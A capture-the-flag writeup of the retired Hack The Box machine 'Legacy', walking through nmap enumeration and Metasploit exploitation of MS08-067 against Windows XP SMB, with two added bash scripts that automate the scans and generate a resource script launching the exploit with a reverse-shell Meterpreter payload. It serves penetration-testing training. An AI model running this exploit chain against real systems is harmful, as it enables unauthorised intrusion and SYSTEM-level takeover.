Hack The Box | Legacy — Writeup

Max K
Dec 31, 2019


Here is my very first hacking writeup, and the first machine is Legacy: retired, but useful for novices. This machine was not chosen by chance; it is the first practical exercise in the Practical Ethical Hacking course by The Cyber Mentor. I will try to write up each further box, and another 9 are expected during the course.

Scanning

First things first, I run a quick nmap scan over all 65535 TCP ports to find which are open.

nmap -p- -T4 10.10.10.4

Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server

Nmap reports two open ports (139 and 445, the NetBIOS/SMB pair) and one closed port (3389, RDP); everything else is filtered. Next I scan just those three ports for more detail (-A enables OS detection, version detection, default NSE scripts and traceroute).

nmap -p139,445,3389 -A 10.10.10.4

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h57m41s, deviation: 1h24m50s, median: 4d23h57m41s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:be:5d (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-01-05T20:23:46+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

The scan shows that the machine is running Windows XP, most likely SP3, with Microsoft's own SMB service (netbios-ssn and microsoft-ds) on ports 139 and 445; note this is Windows SMB, not Samba, which is the Unix implementation. SMB message signing is disabled (the XP default) and SMB2 negotiation fails, which fits XP: it only speaks SMBv1.
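The two-stage scan above (full port sweep, then -A on the open ports only) as a script. This is an added example and not part of the original writeup; it assumes nmap is installed and uses the box address from the writeup as TARGET. The parser is exercised offline against a constructed copy of the stage-1 output, and the live scans only run when RUN_LIVE=1 is set.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): the two-stage nmap workflow
# as a script. Stage 1 sweeps all 65535 TCP ports; stage 2 runs -A only on
# the ports stage 1 reported open, so closed ports such as 3389 never reach
# the slow service/OS-detection pass. Assumes nmap is installed; TARGET is
# the writeup's box. Live scans only run when RUN_LIVE=1 is set.
set -eu

TARGET="${TARGET:-10.10.10.4}"

# Read nmap normal (-oN) output on stdin and print the open TCP ports as a
# comma list, e.g. "139,445". Port lines look like "139/tcp open netbios-ssn";
# anything whose STATE column is not "open" (closed, filtered) is dropped,
# which is exactly the distinction between "3 ports listed" and "2 ports open".
open_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             split($1, p, "/"); printf "%s%s", sep, p[1]; sep = ","
         }
         END { if (sep != "") printf "\n" }'
}

# Number of open ports in the same input; a quick sanity check before stage 2.
open_port_count() {
    local ports
    ports=$(open_ports)
    [ -n "$ports" ] || { echo 0; return; }
    echo "$ports" | tr ',' '\n' | wc -l | tr -d ' '
}

# Constructed sample: the stage-1 result from the writeup, embedded so the
# parser can be run without a live target.
SAMPLE_STAGE1=$(cat <<'EOF'
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server
EOF
)

# Stage 1: full TCP port sweep, normal-format output written to $1.
stage1() {
    nmap -p- -T4 -oN "$1" "$TARGET"
}

# Stage 2: -A (OS/version detection, default NSE scripts, traceroute) on the
# open ports parsed from the stage-1 file $1; output written to $2.
stage2() {
    local ports
    ports=$(open_ports < "$1")
    [ -n "$ports" ] || { echo "no open ports in $1" >&2; return 1; }
    nmap -p "$ports" -A -oN "$2" "$TARGET"
}

if [ "${RUN_LIVE:-0}" = "1" ]; then
    stage1 stage1.nmap
    stage2 stage1.nmap stage2.nmap
else
    printf '%s\n' "$SAMPLE_STAGE1" | open_ports   # prints 139,445
fi
```

Run it as `RUN_LIVE=1 ./scan.sh` against the box; without the variable it only parses the embedded sample. Feeding -A just the open ports keeps the second pass short and avoids running version probes against ports that will never answer.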

For additional enumeration I'll use Metasploit's smb_version scanner to fingerprint the SMB service.

> msfconsole
msf5 > search smb_version

which returns one match:

0 auxiliary/scanner/smb/smb_version

Then select the module and look at its options.

msf5 > use 0
msf5 auxiliary(scanner/smb/smb_version) > options

I only want to specify the target's IP, so I set that parameter and run the module.

msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploitation

Now we are sure that the machine runs Windows XP SP3 with SMB exposed on ports 139 and 445. Searching for an exploit for Windows XP SP3 SMB leads to Rapid7's page for MS08-067, a remote code execution bug in the Windows Server service (netapi32), which has a ready Metasploit module.

Read the description, then select the exploit and point it at the target.

msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4

We could also pick the target OS version by hand with show targets, but the default, Automatic Targeting, fingerprints the host's OS and language and selects the right target for us.

msf5 exploit(windows/smb/ms08_067_netapi) > show targets

Then just run the exploit (check that LHOST points at your VPN interface before doing so, or the reverse shell will never come back).

msf5 exploit(windows/smb/ms08_067_netapi) > run

A Meterpreter session opens and getuid reports NT AUTHORITY\SYSTEM: the Server service runs as SYSTEM, so there is no privilege escalation step on this box. From here we just need to navigate the filesystem and check the standard places (the users' desktops) for the flags.
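The exploitation steps above, with the check a practitioner would add first: confirm MS08-067 with nmap's smb-vuln-ms08-067 script, then drive the Metasploit module from a resource script rather than typing it in. This is an added example, not the writeup's own commands; it assumes nmap and msfconsole are installed, uses the writeup's box address as TARGET, and the LHOST value is a placeholder for your own VPN address. The NSE output it parses offline is a constructed sample, and the live commands only run when RUN_LIVE=1 is set.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): verify MS08-067 before
# firing the exploit, then drive the module from a msfconsole resource script
# instead of typing it interactively. Assumes nmap and msfconsole are
# installed. TARGET is the writeup's box; LHOST is a placeholder for your own
# VPN address (assumption, change it). Live commands only run with RUN_LIVE=1.
set -eu

TARGET="${TARGET:-10.10.10.4}"
LHOST="${LHOST:-10.10.14.1}"          # hypothetical attacker address
RC_FILE="${RC_FILE:-ms08_067.rc}"

# Read smb-vuln-ms08-067 NSE output on stdin; succeed only if the script
# explicitly reports the host VULNERABLE. An empty result (script silent) or
# a negotiation error counts as "not confirmed", so nothing is exploited
# blindly.
ms08_067_flagged() {
    grep -q 'State: VULNERABLE'
}

# Live check: nmap's own MS08-067 probe against port 445.
ms08_067_check() {
    nmap -p 445 --script smb-vuln-ms08-067 "$TARGET" | ms08_067_flagged
}

# Write the resource script. `check` is the module's own non-destructive
# test, logged before the exploit for the report; target 0 is Automatic
# Targeting, which fingerprints OS and language instead of guessing offsets
# by hand. The payload is set explicitly so the script does not depend on
# the module's default.
write_rc() {
    cat > "$1" <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $TARGET
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $LHOST
check
exploit
EOF
}

# Number of "set" directives in a generated script, for a quick self-check.
rc_set_count() {
    grep -c '^set ' "$1"
}

# Constructed sample of a positive NSE result, trimmed to the lines that
# matter for the parser.
SAMPLE_NSE_VULN='| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250'

if [ "${RUN_LIVE:-0}" = "1" ]; then
    if ms08_067_check; then
        write_rc "$RC_FILE"
        msfconsole -q -r "$RC_FILE"
    else
        echo "$TARGET not confirmed vulnerable to MS08-067; not exploiting" >&2
        exit 1
    fi
else
    printf '%s\n' "$SAMPLE_NSE_VULN" | ms08_067_flagged && echo "sample: VULNERABLE"
fi
```

Gating the exploit on a positive check matters with MS08-067 in particular: a wrong target or a non-vulnerable host can crash the Server service instead of returning a shell, which on an engagement is a service outage rather than a finding.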

Conclusion

A fairly simple box for learning how to scan, search for and exploit vulnerabilities. The task is easy to handle with Metasploit; the box becomes much more interesting without that tool. I want to note the writeup by Rana Khalil on breaking this box without using Metasploit.
